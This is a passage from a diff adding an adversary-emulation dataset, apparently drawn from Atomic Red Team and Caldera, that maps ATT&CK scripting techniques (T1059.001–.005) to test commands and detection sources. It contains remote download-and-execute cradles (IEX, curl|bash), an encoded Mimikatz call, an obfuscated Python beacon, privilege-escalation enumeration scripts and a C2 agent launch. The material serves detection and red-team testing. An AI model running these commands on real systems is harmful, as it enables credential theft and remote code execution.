$credential;\n};\nReceive-Job -Job $job -Wait;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.user.name" + } + ] + }, + { + "plugins.stockpile.app.requirements.basic": [ + { + "source": "host.user.name", + "edge": "has_password", + "target": "host.user.password" + } + ] + } + ] + }, + { + "id": "bfff9006-d1fb-46ce-b173-92cb04e9a031", + "name": "PowerShell bitly Link Download", + "description": "Download", + "tactic": "execution", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh": { + "command": "powershell.exe -c IEX (New-Object Net.Webclient).downloadstring(\"https://bit.ly/33H0QXi\") \n" + } + } + } + }, + { + "id": "ccdb8caf-c69e-424b-b930-551969450c57", + "name": "PowerShell Invoke MimiKats", + "description": 
"Download", + "tactic": "execution", + "technique": { + "attack_id": "T1059.001", + "name": "Command and Scripting Interpreter: PowerShell" + }, + "platforms": { + "windows": { + "psh": { + "command": "powershell -enc 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\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + 
"source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data 
provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1059.002", + "command_list": [ + "osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\\\\\\\" | python &\\\"\"\n", + "osascript bookmark.scpt #{host.chrome.bookmark_title[filters(max=1)]} #{server.malicious.url[filters(max=1)]}\n" + ], + "commands": [ + { + "command": "osascript -e \"do shell script \\\"echo \\\\\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\\\\\\\" | python &\\\"\"\n", + "source": "atomics/T1059.002/T1059.002.yaml", + "name": "Atomic Red Team Test - Command and 
Scripting Interpreter: AppleScript" + }, + { + "command": "osascript bookmark.scpt #{host.chrome.bookmark_title[filters(max=1)]} #{server.malicious.url[filters(max=1)]}\n", + "source": "data/abilities/execution/de52784d-4de6-4d4e-b79e-e7b68fe037fb.yml", + "name": "Add a malicous bookmark which looks like a current one" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.002", + "display_name": "Command and Scripting Interpreter: AppleScript", + "atomic_tests": [ + { + "name": "AppleScript", + "auto_generated_guid": "3600d97d-81b9-4171-ab96-e4386506e2c2", + "description": "Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of \"t3VhVOs/DyCcDTFzIKanRxkvk3I=\", unless 'Little Snitch' is installed, in which case it will just exit. \nYou can use netcat to listen for the connection and verify execution, e.g. use \"nc -l 80\" in another terminal window before executing this test and watch for the request.\n\nReference: https://github.com/EmpireProject/Empire\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "osascript -e \"do shell script \\\"echo \\\\\\\"import 
sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg=='));\\\\\\\" | python &\\\"\"\n", + "name": "sh" + } + } + ] + }, + { + "id": "de52784d-4de6-4d4e-b79e-e7b68fe037fb", + "name": "Add bookmark", + "description": "Add a malicous bookmark which looks like a current one", + "tactic": "execution", + "technique": { + "attack_id": "T1059.002", + "name": "Command and Scripting Interpreter: AppleScript" + }, + "platforms": { + "darwin": { + "sh": { + "command": "osascript bookmark.scpt #{host.chrome.bookmark_title[filters(max=1)]} #{server.malicious.url[filters(max=1)]}\n", + "payloads": [ + "bookmark.scpt" + ] + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface 
and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + 
"target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1059.003", + "command_list": [ + "Start-Process #{script_path}\n", + "Start-Process $env:TEMP\\T1059.003_script.bat\n", + "echo \"#{message}\" > \"%TEMP%\\test.bin\" & type \"%TEMP%\\test.bin\"\n", + "echo \"Hello from the Windows Command Prompt!\" > \"#{file_contents_path}\" & type \"#{file_contents_path}\"\n", + "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > hello.txt & type hello.txt\n", + "%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! 
> #{output_file} & type #{output_file}\n", + "cmd /c \"for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p $env:temp\\T1059_003note.txt\" | out-null\n", + null + ], + "commands": [ + { + "command": "Start-Process #{script_path}\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "Start-Process $env:TEMP\\T1059.003_script.bat\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "echo \"#{message}\" > \"%TEMP%\\test.bin\" & type \"%TEMP%\\test.bin\"\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "echo \"Hello from the Windows Command Prompt!\" > \"#{file_contents_path}\" & type \"#{file_contents_path}\"\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > hello.txt & type hello.txt\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! 
> #{output_file} & type #{output_file}\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": "cmd /c \"for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p $env:temp\\T1059_003note.txt\" | out-null\n", + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + }, + { + "command": null, + "source": "atomics/T1059.003/T1059.003.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Windows Command Shell" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.003", + "display_name": "Command and Scripting Interpreter: Windows Command Shell", + "atomic_tests": [ + { + "name": "Create and Execute Batch Script", + "auto_generated_guid": "9e8894c0-50bd-4525-a96c-d4ac78ece388", + "description": "Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "command_to_execute": { + "description": "Command to execute within script.", + "type": "String", + "default": "dir" + }, + "script_path": { + "description": "Script path.", + "type": "Path", + "default": "$env:TEMP\\T1059.003_script.bat" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Batch file must exist on disk at specified location (#{script_path})\n", + "prereq_command": "if (Test-Path #{script_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item #{script_path} -Force | Out-Null\nSet-Content -Path #{script_path} -Value \"#{command_to_execute}\"\n" + } + ], + "executor": { + "command": "Start-Process #{script_path}\n", + "cleanup_command": "Remove-Item #{script_path} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Writes text to a file and displays it.", + 
"auto_generated_guid": "127b4afe-2346-4192-815c-69042bec570e", + "description": "Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_contents_path": { + "description": "Path to the file that the command prompt will drop.", + "type": "Path", + "default": "%TEMP%\\test.bin" + }, + "message": { + "description": "Message that will be written to disk and then displayed.", + "type": "String", + "default": "Hello from the Windows Command Prompt!" + } + }, + "executor": { + "command": "echo \"#{message}\" > \"#{file_contents_path}\" & type \"#{file_contents_path}\"\n", + "cleanup_command": "del \"#{file_contents_path}\" >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Suspicious Execution via Windows Command Shell", + "auto_generated_guid": "d0eb3597-a1b3-4d65-b33b-2cda8d397f20", + "description": "Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "File to output to", + "type": "String", + "default": "hello.txt" + }, + "input_message": { + "description": "Message to write to file", + "type": "String", + "default": "Hello, from CMD!" + } + }, + "executor": { + "command": "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}\n", + "name": "command_prompt" + } + }, + { + "name": "Simulate BlackByte Ransomware Print Bombing", + "auto_generated_guid": "6b2903ac-8f36-450d-9ad5-b220e8a2dcb9", + "description": "This test attempts to open a file a specified number of times in Wordpad, then prints the contents. \nIt is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. 
\nSee https://redcanary.com/blog/blackbyte-ransomware/. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_print": { + "description": "File to be opened/printed by Wordpad.", + "type": "String", + "default": "$env:temp\\T1059_003note.txt" + }, + "max_to_print": { + "description": "The maximum number of Wordpad windows the test will open/print.", + "type": "String", + "default": 75 + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "File to print must exist on disk at specified location (#{file_to_print})\n", + "prereq_command": "if (test-path \"#{file_to_print}\"){exit 0} else {exit 1}\n", + "get_prereq_command": "new-item #{file_to_print} -value \"This file has been created by T1059.003 Test 4\" -Force | Out-Null\n" + } + ], + "executor": { + "command": "cmd /c \"for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}\" | out-null\n", + "cleanup_command": "stop-process -name wordpad -force -erroraction silentlycontinue\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + 
"data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1059.004", + "command_list": [ + "sh -c \"echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh\"\nsh -c \"echo 'ping -c 4 
8.8.8.8' >> /tmp/art.sh\"\nchmod +x /tmp/art.sh\nsh /tmp/art.sh\n", + "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\nwget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\n", + "chmod +x PathToAtomicsFolder/T1059.004/src/AutoSUID.sh\nbash PathToAtomicsFolder/T1059.004/src/AutoSUID.sh\n", + "chmod +x #{autosuid}\nbash #{autosuid}\n", + "chmod +x PathToAtomicsFolder/T1059.004/src/LinEnum.sh\nbash PathToAtomicsFolder/T1059.004/src/LinEnum.sh\n", + "chmod +x #{linenum}\nbash #{linenum}\n", + "nohup ./sandcat.go -server #{server} &\n" + ], + "commands": [ + { + "command": "sh -c \"echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh\"\nsh -c \"echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh\"\nchmod +x /tmp/art.sh\nsh /tmp/art.sh\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\nwget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "chmod +x PathToAtomicsFolder/T1059.004/src/AutoSUID.sh\nbash PathToAtomicsFolder/T1059.004/src/AutoSUID.sh\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "chmod +x #{autosuid}\nbash #{autosuid}\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "chmod +x PathToAtomicsFolder/T1059.004/src/LinEnum.sh\nbash 
PathToAtomicsFolder/T1059.004/src/LinEnum.sh\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "chmod +x #{linenum}\nbash #{linenum}\n", + "source": "atomics/T1059.004/T1059.004.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Bash" + }, + { + "command": "nohup ./sandcat.go -server #{server} &\n", + "source": "data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml", + "name": "Start a new 54ndc47 agent in background" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.004", + "display_name": "Command and Scripting Interpreter: Bash", + "atomic_tests": [ + { + "name": "Create and Execute Bash Shell Script", + "auto_generated_guid": "7e7ac3ed-f795-4fa5-b711-09d6fbe9b873", + "description": "Creates and executes a simple bash script.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "script_path": { + "description": "Script path", + "type": "Path", + "default": "/tmp/art.sh" + } + }, + "executor": { + "command": "sh -c \"echo 'echo Hello from the Atomic Red Team' > #{script_path}\"\nsh -c \"echo 'ping -c 4 8.8.8.8' >> #{script_path}\"\nchmod +x #{script_path}\nsh #{script_path}\n", + "cleanup_command": "rm #{script_path}\n", + "name": "sh" + } + }, + { + "name": "Command-Line Interface", + "auto_generated_guid": "d0c88567-803d-4dca-99b4-7ce65e7b257c", + "description": "Using Curl to download and pipe a payload to Bash. 
NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.\n\nUpon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\nwget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash\n", + "cleanup_command": "rm /tmp/art-fish.txt\n", + "name": "sh" + } + }, + { + "name": "Harvest SUID executable files", + "auto_generated_guid": "46274fc6-08a7-4956-861b-24cbbaa0503c", + "description": "AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. \n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "autosuid": { + "description": "Path to the autosuid shell script", + "type": "Path", + "default": "PathToAtomicsFolder/T1059.004/src/AutoSUID.sh" + }, + "autosuid_url": { + "description": "Path to download autosuid shell script", + "type": "Url", + "default": "https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "AutoSUID must exist on disk at specified location (#{autosuid})\n", + "prereq_command": "if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "curl #{autosuid_url} --output #{autosuid}\n" + } + ], + "executor": { + "command": "chmod +x #{autosuid}\nbash #{autosuid}\n", + "name": "sh" + } + }, + { + "name": "LinEnum tool execution", + "auto_generated_guid": "a2b35a63-9df1-4806-9a4d-5fe0500845f2", + "description": "LinEnum is a bash script that performs discovery commands for accounts,processes, kernel 
version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "linenum": { + "description": "Path to the LinEnum shell script", + "type": "Path", + "default": "PathToAtomicsFolder/T1059.004/src/LinEnum.sh" + }, + "linenum_url": { + "description": "Path to download LinEnum shell script", + "type": "Url", + "default": "https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "LinnEnum must exist on disk at specified location (#{linenum})\n", + "prereq_command": "if [ -f #{linenum} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "curl #{linenum_url} --output #{linenum}\n" + } + ], + "executor": { + "command": "chmod +x #{linenum}\nbash #{linenum}\n", + "name": "sh" + } + } + ] + }, + { + "id": "b1d41972-3ad9-4aa1-8f7f-05f049a2980e", + "name": "Start 54ndc47", + "description": "Start a new 54ndc47 agent in background", + "tactic": "execution", + "technique": { + "attack_id": "T1059.004", + "name": "Command and Scripting Interpreter: Unix Shell" + }, + "platforms": { + "darwin": { + "sh": { + "command": "nohup ./sandcat.go -server #{server} &\n", + "cleanup": "pkill -f sandcat\n", + "payloads": [ + "sandcat.go" + ] + } + }, + "linux": { + "sh": { + "command": "nohup ./sandcat.go -server #{server} &\n", + "cleanup": "pkill -f sandcat\n", + "payloads": [ + "sandcat.go" + ] + } + } + }, + "singleton": true + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + 
"Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + 
"data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1059.005", + "command_list": [ + "cscript PathToAtomicsFolder\\T1059.005\\src\\sys_info.vbs > $env:TEMP\\T1059.005.out.txt", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Exec\"\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n" + ], + "commands": [ + { + "command": "cscript PathToAtomicsFolder\\T1059.005\\src\\sys_info.vbs > $env:TEMP\\T1059.005.out.txt", + "source": "atomics/T1059.005/T1059.005.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: Visual Basic" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Exec\"\n", + "source": "atomics/T1059.005/T1059.005.yaml", + 
